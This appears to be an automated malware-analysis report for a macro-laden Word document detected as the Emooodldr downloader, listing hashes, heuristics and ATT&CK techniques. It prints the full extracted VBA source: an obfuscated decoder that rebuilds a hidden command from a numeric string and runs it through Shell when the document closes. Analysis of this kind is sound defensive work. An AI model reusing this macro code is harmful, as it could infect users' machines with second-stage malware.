Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 f703df08f5e7388f…

MALICIOUS

Office (OOXML)

33.1 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-05-16
MD5: 7d3b215f3fa77a0e6bb20612aecbacfa SHA-1: 771c75a24462f8eca232d23456b297b1dbce1f79 SHA-256: f703df08f5e7388f4873137977cf1c96a24293a7bf93b952c586c27b34e4212e
244 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. It contains VBA macros, including an Auto_Close macro, which utilizes the Shell() function to execute a payload. The script attempts to download and run a second-stage payload, indicated by the use of Shell() and the embedded, albeit truncated, string that likely represents a command or URL.

Heuristics 6

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2273 bytes
SHA-256: 8b2d1d1c707186efeaa5b5dc57db1fc64fb20ffc3fa03d08ff31cefb77f1f1ac
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function riciclato(piattino As Integer) As String
 Dim peccato() As Variant
 peccato = Array("k", "d", ".", "A", "C", "a", "l", "W", "t", "o", "j", "S", ")", "/", "h", "p", "\", "y", "g", "v", "r", "J", ":", "f", "P", "i", "m", "=", "O", "-", "B", "w", "c", "s", ",", "N", " ", "E", "F", "?", "Q", "D", "n", "+", "'", "T", "b", "$", "(", ";", "x", "e")
 Dim satellite As Integer
 
 For satellite = LBound(peccato) To UBound(peccato)
   If satellite = piattino Then
    riciclato = peccato(satellite)
   End If
 Next
 
End Function

Function uncinetto(brodo As String)
    brodo = StrConv(brodo, vbUnicode)
    uncinetto = Split(Left(brodo, Len(brodo) - 1), vbNullChar)
End Function

Function estonia(ampliare As String) As String
  Dim inter As Integer
  Dim passivo As String
  Dim eclissi As Variant
  eclissi = uncinetto(Trim(ampliare))
  For satellite = 0 To Len(ampliare)
  
    If (satellite + 1) <= UBound(eclissi) Then
    Dim ambrato As String
    ambrato = eclissi(satellite)
    satellite = satellite + 1
    ambrato = ambrato + eclissi(satellite)
    
    passivo = passivo + riciclato(Int(ambrato))
    End If
  Next
  
  estonia = passivo
End Function

Public Function tentacolo(satellite As String)
  Shell satellite, 0
End Function

Sub AutoClose()
 Call Application.Run("tentacolo", estonia("32260102515051361332361509315120331451060636293750513236301715053333362935092436290409262605420136483551312928461051320836111733085126023551080207514604062551420812024109314206090501382506514844140808152213130900105125420826090809203317023209261342254209132605202509180226012344343647514219220324244103450336433644164017083803210251505144124936110805200829242009325133333647514219220324244103450344164017083803210251505144493648355131292846105132083611173308512602355108020751460406255142081202410931420609050111082025421848441408081522131309001051254208260908092033170232092613330215141539250127260520250918441249"))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: 6864495207ef77277ea89eb561a4719fc8503fe39dbc3e51703fc9dce91eb3fc
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).